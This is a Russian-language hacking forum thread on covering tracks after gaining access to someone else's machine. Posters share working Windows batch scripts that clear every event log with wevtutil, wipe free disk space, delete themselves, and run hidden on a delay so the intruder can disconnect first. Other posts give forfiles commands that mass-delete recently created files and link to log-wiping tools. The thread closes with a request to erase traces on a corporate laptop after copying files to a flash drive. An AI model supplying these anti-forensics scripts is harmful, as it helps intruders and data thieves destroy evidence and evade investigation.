Проблема Как почистить за собой логи и т.п?

[Tayrus]

Допустим такую ситуацию: мы кого-то "протестировали" получили доступ к тачке, выполнили что хотели, но как нам скрыть наше присутствие на этой тачке? Как очистить логи? Как удалить файл чтобы его нельзя было восстановить через спец. программы?

 

[ghost]

Универсальных программ под все нужды не существует. Ручками это делать приходится в большинстве случаев.

 

[GhostKey]

Запомни одно золотое правило "логирование" соединений, каких либо происходящих процессов в системе. Закладывается туда фундаментально, то есть дефолтная программная функция, как и процесс. Поэтому даже если ты зачистишь за собой как следует, это не спасет тебя в случае если трафик будет анализировать опытный эксперт. Обычно если это дедик туда наливают внешний трафик, раздают или отдают нерадивым которые еще не совсем осознают весь риск пользоваться чем то публичным.

 

[GhostKey]

Вообще в зависимости от ситуации иногда левого трафика не нагонишь, приходится, скидывать до дефолтных настроек оборудование, или приводить в не профпригодность. Зависит от конкретного оборудования и случая.

 

[bycat]

Hack windows clearing logs - YouTube

 

[Bypass]

Как сказано выше нужно ручками себе скрипт накидывать под конкретные задачи, можно такой батник заюзать

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
cipher /w:C:\
del %0
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
del %0
exit

Чистит полностью журнал, после очистки трет в 3 прохода свободное место.

Можно поиграть с расширениями логов которые пишут сторонние софты .bac, .log, .tmp и т.д

for /d %%i in (C:\*) do start /b cmd /c (del "%%i\*.log")

 

[NewUSERSO]

Как сказано выше нужно ручками себе скрипт накидывать под конкретные задачи, можно такой батник заюзать

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
cipher /w:C:\
del %0
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
del %0
exit

Чистит полностью журнал, после очистки трет в 3 прохода свободное место.

Можно поиграть с расширениями логов которые пишут сторонние софты .bac, .log, .tmp и т.д

for /d %%i in (C:\*) do start /b cmd /c (del "%%i\*.log")

я так понимаю это для винды только? на линуксе не пойдет?

 

[Valkiria]

я так понимаю это для винды только? на линуксе не пойдет?

Естественно, для дедиков Windows.
На русскоязычной версии Окон работает отлично. Можно запустить батник и отключиться от дедика. Батник самоликвидируется.

 

[Bypass]

Естественно, для дедиков Windows.
На русскоязычной версии Окон работает отлично. Можно запустить батник и отключиться от дедика. Батник самоликвидируется.

+ в начале задержку поставить нужно
Например будет
Запускаем скрыто

run.vbs

Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("run.cmd"), 0, True

run.bat

PING -n 30 -w 10 127.0.0.1 > nul
del hide.vbs
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
cipher /w:C:\
del %0
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
del %0
exit

считает 30 сек и выполняется
30 сек хватит отконектится от дедика скрытый режим нужно чтобы при затирание логов окно cmd не моячило ибо затирание свободного места процедура не быстрая

 

[Valkiria]

А, вот ещё вариант батника для чистки логов на дедиках Windows.
Я этим пользуюсь.

@echo off
timeout /T 60
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1

goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo.
:theEnd
rd /s /q %systemdrive%\$RECYCLE.BIN
del %0

 

[Valkiria]

Ещё существует вот такая программа для чистки логов на дедиках Windows.
Правда, не всем она придётся по душе ): нет открытого исходного кода

Скачать:

Ссылка скрыта от гостей

 

[Valkiria]

А ещё нашла у себя на HDD какую-то старую программулину для чистки логов.
Вот скриншот.
Программа древняя, предназначена была для работы в более ранних версиях Окон.

Яндекс-диск распознаёт в ней вирус.
Но какой-то вирус в ней вряд-ли имеется.
Я общалась на протяжении нескольких лет с её автором: он вряд-ли туда что-то запилил.
Ранее антивирусы были к этой пограмулине равнодушны, а сейчас что-то изменилось.
Качайте на свой страх и риск.

Ссылка скрыта от гостей

Пароль:
codeby.net

 

[Bypass]

В топку школотулзы

forfiles.exe /p C:\ /s /m *.* /D 15.04.2018 /c "cmd /c del /q /f @file"

Только юзайте аккуратно )

/D 15.04.2018 (удалит все файлы которые были созданы сегодня)
/d -1 (старше одного дня)
Ну и тд

Вывод измененных сегодня файлов удобно посмотреть куда могли наследить

forfiles.exe /p C:\ /s /m *.* /D 15.04.2018 /c "cmd /c echo @path @fdate >> "C:\Результат.txt"
notepad "C:\Результат.txt"
exit

СПРАВКА ПО FORFILES

FORFILES [/P <путь>] [/M <маска_поиска>] [/S]
[/C <команда>] [/D [+ | -] {dd.MM.yyyy | dd}]

Описание.
Выбор файла (или набора файлов) и выполнение команды
с этим файлом. Программа полезна для пакетных заданий.

Параметры:
/P <путь> Путь, с которого начинается поиск.
По умолчанию используется текущая
рабочая папка (.).

/M <маска_поиска> Поиск файлов с помощью маски.
Маска поиска по умолчанию "*" .

/S Рекурсивное выполнение программы forfiles
во всех подпапках, аналогично "DIR /S".

/C <команда> Команда, которая выполняется для каждого файла.
Строки команд необходимо заключать в прямые
кавычки.

Команда по умолчанию "cmd /c echo @file".

Следующие переменные могут использоваться
в строке команды:
@file - возвращает имя файла.
@fname - возвращает имя файла без
расширения.
@Ext - возвращает только расширение имени
файла.
@path - возвращает полный путь к файлу.
@relpath - возвращает относительный путь к
файлу.
@isdir - возвращает значение "TRUE", если типом
файла является папка, и "FALSE" для файлов.
@fsize - возвращает размер файла
в байтах.
@fdate - возвращает дату последнего изменения
файла.
@ftime - возвращает время последнего изменения
файла.

Для включения специальных символов в строку команды
следует использовать шестнадцатеричный код символа
в формате 0xHH (например, 0x09 для табуляции).
Перед внутренними командами CMD.exe необходимо ставить
"cmd /c".

/D <дата> Выбор файлов, у которых дата последнего изменения
больше или равна (+) либо меньше или равна
(-) указанной дате при использовании формата
"dd.MM.yyyy"; либо файлов, у которых дата последнего
изменения больше или равна (+)
текущей дате плюс "dd" дней либо меньше или
равна (-) текущей дате минус "dd" дней.
Допустимым числом дней "dd" является любое
число в диапазоне 0 - 32768.
"+" используется по умолчанию, если знак не указан.

/? Вывод справки по использованию.

Примеры:
FORFILES /?
FORFILES
FORFILES /P C:\WINDOWS /S /M DNS*.*
FORFILES /S /M *.txt /C "cmd /c type @file | more"
FORFILES /P C:\ /S /M *.bat
FORFILES /D -30 /M *.exe
/C "cmd /c echo @path 0x09 был изменен 30 дней назад"
FORFILES /D 01.01.2001
/C "cmd /c echo @fname является новым с 1-янв-2001"
FORFILES /D +25.1.2011 /C "cmd /c echo @fname является новым сегодня"
FORFILES /M *.exe /D +1
FORFILES /S /M *.doc /C "cmd /c echo @fsize"
FORFILES /M *.txt /C "cmd /c if @isdir==FALSE notepad.exe @file"

Можно менять атрибуты, удалять, изменять дату создания, перезаписывать и т.д
Удобная тулза и антивирусы гавкать не будут )

 

[SearcherSlava]

Web Server Log File Analysis

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

 

[Питер]

Парни подскажите, пожалуйста, а можно ли затереть логи на корпоративном ноуте, без админского доступа, после того как файлы скопированы на флешку? Если да то, можно выше перечисленными батниками воспользоваться или другой какой вариант?